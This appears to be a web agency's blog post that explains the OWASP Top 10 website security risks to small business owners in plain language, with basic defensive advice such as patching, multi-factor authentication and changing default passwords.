Top 10 Most Critical Security Risks For Business Websites

Small businesses get hacked. Here are the most common risks to watch out for.

Table of Contents
    Add a header to begin generating the table of contents

    Your business website is beautiful. It’s effective. It is consistently driving new traffic to your business. But it can still be a liability if it isn’t safe. To stay safe, it’s important to be aware of the most common security risks for business websites.

    We’ve all seen what happens in the business world when sensitive information gets compromised. And it’s not pretty. While web security is not the most glamorous of topics, it’s perhaps one of the most important issues to address when working on your business website.

    Security can be a dense issue to navigate, especially if you’re not a software developer. But it’s still important to understand the basics to make sure that your web provider is taking care of you, and your customers, in the way that you expect.

    So where can we get started?

    Yes, Small Businesses Are At Risk Too

    Well, the first step is acknowledging that there are a number of security risks for business websites, especially small businesses. It’s easy to think that only huge corporations like Amazon, Target, and the like are in the crosshairs for attackers.

    But just because your business is small, doesn’t mean it’s not a target.

    An important misconception about security threats is that hackers are explicitly targeting your website directly. In reality, they’re attacking the application that supports your site.

    Most websites are powered by a CMS or web application, and some of these are more secure than others. Not all of the risks to applications that we’re going to discuss will apply to your business. But as a rule, know that the more custom programs used, (CMS, CRM, etc,) the more security risks for business websites.

    How is Risk Assessed, Anyways?

    In what ways can your website fall vulnerable to security risks?

    The Open Web Application Security Project (OWASP) is an “open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted.” They keep an eye on major threats and provide guidance for developers around the world. They also have tons of free resources to help further the mission of an open and secure web.

    One of these resources is their Top 10 Security Risks document, recently revised in 2017. In it, they take a  comprehensive look at the 10 biggest security risks for websites. Just in case you don’t have the time to get a software engineering degree, we thought we would break it down and explain why each is important.

    There are 4 basic dimensions to take into account when analyzing security risks for business websites:

    • Exploitability– How easy it is for a hacker to carry out the attack (1: Difficult to Exploit, 3 Easy to Exploit)
    • Prevalence– How commonly this attack vector is used (1: Uncommon, 3: Widespread)
    • Ease of detection– How difficult is it recognize a threat to this attack vector (1: Difficult to detect, 3 Easy to detect)
    • Technical Impact– How much havoc this attack can wreak (1: minor impact, 3: severe impact)

    Here’s a table, based on the OWASP report, to help us understand the most prevalent security risks for business websites, and how they relate to the 4 dimensions of security in terms of how easy they are to exploit.

    RiskExploitabilityPrevalenceEase of DetectionTechnical Impact
    Injection Flaws3233
    Broken Authentication3223
    Sensitive Data Exposure2323
    XML External Entities2233
    Broken Access Control2223
    Security Misconfiguration3332
    Cross-Site Scripting3332
    Insecure Deserialization1223
    Using Component w/ Vulnerabilities2322
    Insufficient Monitoring/Logging2312

    Let’s get into the specific security risks for business websites:

    Risk #1: Injection Flaws

    Exploitability: 3, Prevalence: 2, Ease of Detection: 3, Technical Impact: 3

    The web operates through requests and data transfers. Code – in the browser, on a server, in a database, etc – is responsible for marshaling requests and data from one entity to another.

    An injection flaw happens when an attacker hijacks one of these commands to send untrusted data into a system. It tricks the system into executing unintended commands or accessing data without proper authorization.

    It’s fairly common. It’s easy to exploit. And it can severely compromise your system. For instance, WordPress had a large vulnerability that exposed tens of thousands of websites to the risk of website takeover.

    The solution? Short of being a developer, the best you can do is update, update, update! Software developers are constantly looking for bugs in their code or vulnerabilities they may have missed. When they find bugs or vulnerabilities, they release patches to plug them.

    Staying current on software reduces the risk of injection attacks because it reflects the patches that developers have implemented. The older an application, the more likely an attacker has a record of how to exploit it in their database.

    Risk #2: Broken Authentication

    Exploitability: 3, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    Do your customers have accounts on your website? When your clients log in, you’re authenticating their identification. Proving that they are who they say they are, to make sure you’re keeping private information private.

    When authentication is weak or broken, it allows hackers to assume someone’s identity in that system. They can pretend to be that authenticated user and commit all sorts of fraudulent activity.

    The reality is that attackers have access to hundreds of millions of valid username/password combinations. (And, as we know, many people don’t update their passwords regularly. You can use a password manager to help with this). They can make fraudulent default admin accounts. They have automated tools to hack systems, and good eyes to manually spot vulnerabilities in sites where they should use those automated tools.

    And they may only need access to one account to infiltrate your system.

    To protect against this kind of attack, set up multi-factor authentication whenever possible. The more hoops an attacker has to jump through, the harder it is to get into your system. Also, be sure to pay attention to session management and set application timeouts properly. When they close a browser, log them off the system. Anytime a user walks away from a session while still logged in, the whole system remains vulnerable.

    Risk #3: Sensitive Data Exposure

    Exploitability: 2, Prevalence: 3, Ease of Detection: 2, Technical Impact: 3

    Over the last 5 years, the most common and impactful attacks have been by the mere exposure of too much sensitive data. Software that passes sensitive information via sessions, URLs, or poorly constructed code, increases the risk of this vulnerability.

    While most small business owners don’t really need to worry about constructing URLs, it’s worth knowing that if you see personal information in a browser URL, you should ask some questions.

    Also, keep an eye out for mismatched keys, which can suggest that the site you’re attempting to go to and the one being authenticated against are different. Ever see that “this application can’t be trusted” notice on google?

    It’s often an indicator of such behavior. If that sounds like your website, let us know.

    Risk #4: XML External Entities

    Exploitability: 2, Prevalence: 2, Ease of Detection: 3, Technical Impact: 3

    XML processors evaluate/process external references inside XML documents when making requests. When these processors are compromised, they can be used to disclose sensitive internal files.

    It’s an important risk factor for developers but isn’t usually relevant for small business websites unless you’re running a lot of custom programs. If you do use custom programs, make sure that your web developer and support service are aware of these issues.

    Risk #5: Broken Access Control

    Exploitability: 2, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    It’s important to control who has access to which portions of your website.

    This shouldn’t be confused with broken access, as we mentioned above.

    For example, let’s say you give a contractor admin privileges to your website. Did you remove that access when they were no longer working for you? What about your Google information? Your email service?

    The more lapsed yet valid access points to your system, the more vulnerable you are to attack. Attackers can get into your system and modify your data without you even knowing it. And employees with too much access can break something, intentionally or not. So make sure you know who has access, always!

    Risk #6: Security Misconfiguration

    Exploitability: 3, Prevalence: 3, Ease of Detection: 3, Technical Impact: 2

    This is perhaps the most common risk we see business websites exposed to. Using default configurations and poor password protection for elements in your system.

    Let’s say you buy a router. Or a printer. Or a shared storage system, cloud-based or otherwise. That new component came with a default username and password. Let’s say you set it up and didn’t change that password.

    If an attacker has a list of default usernames and passwords at the ready, they can jump right into your system.

    Make sure that you are changing your passwords and keeping them updated. If you leave insecure default configurations on your system, you are asking for trouble.

    Risk #7- Cross-Site Scripting

    Exploitability: 3, Prevalence: 3, Ease of Detection: 3, Technical Impact: 2

    Let’s imagine for a moment that your website can act as an unwitting accomplice for an attacker. When a visitor gets to your site, the attacker uses YOUR site to execute scripts in a victim’s browser, hijack user sessions, and redirect the visitor to malicious sites.

    Sadly, you don’t have to imagine: that threat is all too real. (And fairly common.)

    When attackers use cross-site scripting, they capture the user’s cookies and sensitive information, redirect traffic, and can even modify your existing page!

    There are ways to prevent this: from using secure forms to coding the site in such a way that visiting browsers can only interpret data and not modify it. Make sure the support team for your website are aware of these ways to mitigate that risk.

    Risk #8- Insecure Deserialization

    Exploitability: 1, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    Converting data into a stream of bytes to store or transfer data is called serialization. When your site’s serialization is insecure, the underlying code inappropriately serializes data and transmits it. If the wrong people get your data, bad things happen.

    It’s tough to exploit from the outside, so it isn’t the number one thing on the radar of most small business sites. Just make sure that your software uses good serialization practices.

    Risk #9- Using Components With Known Vulnerabilities

    Exploitability: 2, Prevalence: 3, Ease of Detection: 2, Technical Impact: 2

    Your site is only as secure as the components that it uses.

    When installing libraries, plugins, frameworks and the like, be sure that they are updated and verified. Like we mention in our Ultimate Guide To Securing Your Business Website, most people gravitate toward free, open-source options when it comes to themes and plugins. But free components may not be updated as often and may be more susceptible to attack.

    And if you install an insecure component, you put the whole site at risk.

    This risk can be particularly acute if you’re using a self-hosted CMS (like WordPress!) and using plugins to get custom functionality. So make sure that your web developer/support team is vetting components appropriately and giving them correct access to your system.

    Risk #10- Insufficient Logging & Monitoring

    Exploitability: 2, Prevalence: 3, Ease of Detection: 1, Technical Impact: 2

    If your site isn’t consistently logging information, and if those logs aren’t being consistently monitored, you won’t know if attackers have broken into your system. If attackers access your system, they can persist there, and even pivot into another system.

    Only accurate logging, and consistent response, can ensure that your system hasn’t been breached. The more detailed your logging, and the better your monitoring, the better the chances of catching aberrant behavior quickly. So again, be sure that your website is being monitored and supported!

    Duke Kimball

    Duke writes words, good. When he's not crafting content for The Pros, he's crafting stories, enjoying craft beer, or gourmet coffee. He is Portlandia.

    Also from the Pros...

    How To Use Google Search Console to Build Your Content Plan

    Want to build a winning content strategy without guesswork? Google Search Console is your secret weapon for uncovering search insights, improving website performance, and crafting data-driven content that ranks. Here’s how to use it effectively!
    Read More

    The Evolution of Search: What Google’s Gemini 2.0 Means for Your Web Traffic

    The search game is changing fast. With Google’s launch of Gemini 2.0, the future of search is more personalized, intuitive, and AI-driven than ever. Businesses and marketers must rethink their strategies as AI reshapes how users find information. Let’s dive into what Gemini 2.0 means for search, SEO, and the future of web traffic.
    Read More

    How to Show Up First in Google for Your Business Name

    We’ve had hundreds of web projects and almost all of them rank first for their business name on Google search.  While many assume that simply having a website is enough, there’s more to the process. Your business name, website setup, and search engine optimization (SEO) strategies play a critical role. That’s why for us, building...
    Read More

    We Think This Is The Best App for Website Demo Recording

    As a web development company, creating website demos has always been a challenging task. Traditional screen recording methods involve multiple takes, complex editing, and long rendering times. Since discovering SupaDemo, we’ve revolutionized how we create website walkthroughs—cutting production time while ensuring high-quality results. Here’s why SupaDemo has become our go-to tool for creating demos quickly and efficiently. 🚀
    Read More

    How This Psychiatry Hub Established a Strong Google Presence with a New Website

    When Rural Hub Psychiatry came to us, they only had a Facebook page for their online presence. While social media can help promote businesses, relying solely on it limits credibility, visibility, and search engine rankings. Just two weeks after launching their SuperSite, they ranked #1 on Google for “Rural Hub Psychiatry Services.” Here’s how having a purpose-built, conversion-focused website transformed their digital presence and why your business might need one too. 🚀
    Read More

    How Is AI Decreasing Your Website Traffic?

    If your website traffic is slipping despite your best SEO efforts, you’re not alone. The rise of AI-powered search tools like ChatGPT and Google Gemini is reshaping the digital landscape, forcing businesses to rethink their strategies. Here’s why it’s happening and how you can adapt to stay ahead.
    Read More

    Never Skip On Audience Capture When Running Promos

    Search engine traffic isn’t as reliable as it used to be. With AI-driven search evolving and traffic trends changing, many businesses are feeling the impact. But here’s the truth: if you’re running promos without capturing your audience, you’re missing out on long-term growth. Here’s why audience capture is a game-changer and how it can future-proof your business. Let me know if you’d like further refinements!
    Read More
    1980s comic-style graphic depicting a man at a front desk handing a thank-you card to a customer

    Learn How to Thank Your Customers (and Get Feedback)

    When was the last time you said a genuine “thank you” to a customer? Not the polite end to a conversation but an intentional moment of appreciation that builds trust and opens the door to valuable feedback. A simple thank-you isn’t just good manners—it’s smart business. Here’s how showing gratitude can strengthen relationships, improve loyalty, and uncover insights to help your business grow.
    Read More